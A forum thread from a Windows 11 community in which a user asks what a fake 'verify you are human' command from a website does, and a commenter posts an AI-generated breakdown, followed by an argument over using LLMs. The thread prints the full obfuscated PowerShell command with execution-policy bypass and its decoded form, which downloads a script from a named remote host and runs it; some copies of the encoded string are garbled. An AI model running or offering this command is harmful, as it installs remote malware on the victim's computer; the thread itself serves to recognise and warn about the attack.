this post was submitted on 23 Jun 2025
17 points (90.5% liked)

Windows 11

1081 readers
7 users here now

Welcome to the community for Windows 11, Microsoft's latest computer operating system.

Rules:

founded 2 years ago
MODERATORS
uidev@lemmy.world
17
What does this command do that this website wants me to "verify" myself by running in the run window? (sh.itjust.works)
submitted 2 weeks ago* (last edited 2 weeks ago) by StarvingMartist@sh.itjust.works to c/windows11@lemmy.world
20 comments fedilink hide all child comments
 

Yeah don't put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

you are viewing a single comment's thread
view the rest of the comments
[–] Pyro@pawb.social 9 points 2 weeks ago* (last edited 2 weeks ago) (18 children)

One of the moments that Ai can be good. I asked googled gemni

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here's a breakdown of what each part does:

  • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it's being used as a wrapper.
  • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
    • powershell: Invokes the PowerShell interpreter.
    • /ep bypass: This is crucial. /ep stands for "execution policy." bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
    • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let's decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod 'https: //mastraw.top/me/day'; iex $site Now we can fully understand the malicious intent:
  • $site = Invoke-RestMethod '# https: //mastraw.top/me/day': This command uses Invoke-RestMethod to download content from the URL 'https://mastraw/. top/me/day' . This URL is likely hosting a malicious PowerShell script or some other form of executable code.
  • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from 'https://mastraw.top/. /me/day' (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
  • Bypass PowerShell's security restrictions.
  • Download a script from a specific remote website '(https. ://mastraw.top/me/day)' .
  • Immediately execute that downloaded script on the victim's computer. The content of the script downloaded from' https :// mastraw.top/me/day' is unknown without accessing that URL, but given the nature of this command, it's almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

Edit:added back tick to urls

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (14 children)

You needed an LLM to figure out this was malware?! Sweet jesus, we're well and truly fucked.

[–] StarvingMartist@sh.itjust.works 1 points 2 weeks ago (6 children)

Chill out you, we all know it was malware, but llms are actually a tool in this use case to find out more about it without executing the code.

I don't like AI anymore than the next guy but this is just a silly response

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (2 children)

"Chill out you"

Fucking priceless. The LLM didn't explain anything beyond what was obvious from just looking at it. It was trying to get you to run a privileged executable. The LLM doesn't have a clue what the executable does, and even admits that. So why bother asking it?

Let's take the tech out of it. You're at a restaurant and you're given a beverage in a glass, but you can see the glass is dirty with food residue. Do you have to consult an LLM to know not to drink out of it? Does it matter what sort of food residue it is? Of course not.

I swear people's critical thinking skills are non-existent or in complete atrophy these days. The only thing of potential interest is the executable itself and if you're posting this question, I'm not sure any explanation or details would mean anything to you.

[–] StarvingMartist@sh.itjust.works 2 points 2 weeks ago (1 children)

Yeah but the LLM isn't the one making a scene

[–] geekwithsoul@lemm.ee 0 points 2 weeks ago (1 children)

Making a scene?! Oh no! Have I shattered the fragile Lemmy decorum with my boorish behavior? How dreadful!

Listen, if you want to believe an LLM has anything useful to say about the malware you're presented with on dodgy sites, go for it.

And I'll be free to think you're a prime example for why we should start requiring a "drivers license" to get on a computer. To each their own.

[–] deleted@lemmy.world 2 points 2 weeks ago (1 children)

Not everyone can understand that it runs a privileged executable.

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago

If it's malware, it - by definition - is going to need to run a privileged executable. That's the "ware" in "malware". The LLM is just explaining the specific method they're attempting to use - which again should be obvious both by the nature of the actions it's requesting from the user as well as the specific text it's asking to be run. It explicitly says it doesn't know anything about the executable that's being run, so it really isn't offering anything particularly useful or actionable - just wasting resources.

load more comments (3 replies)
load more comments (10 replies)
load more comments (13 replies)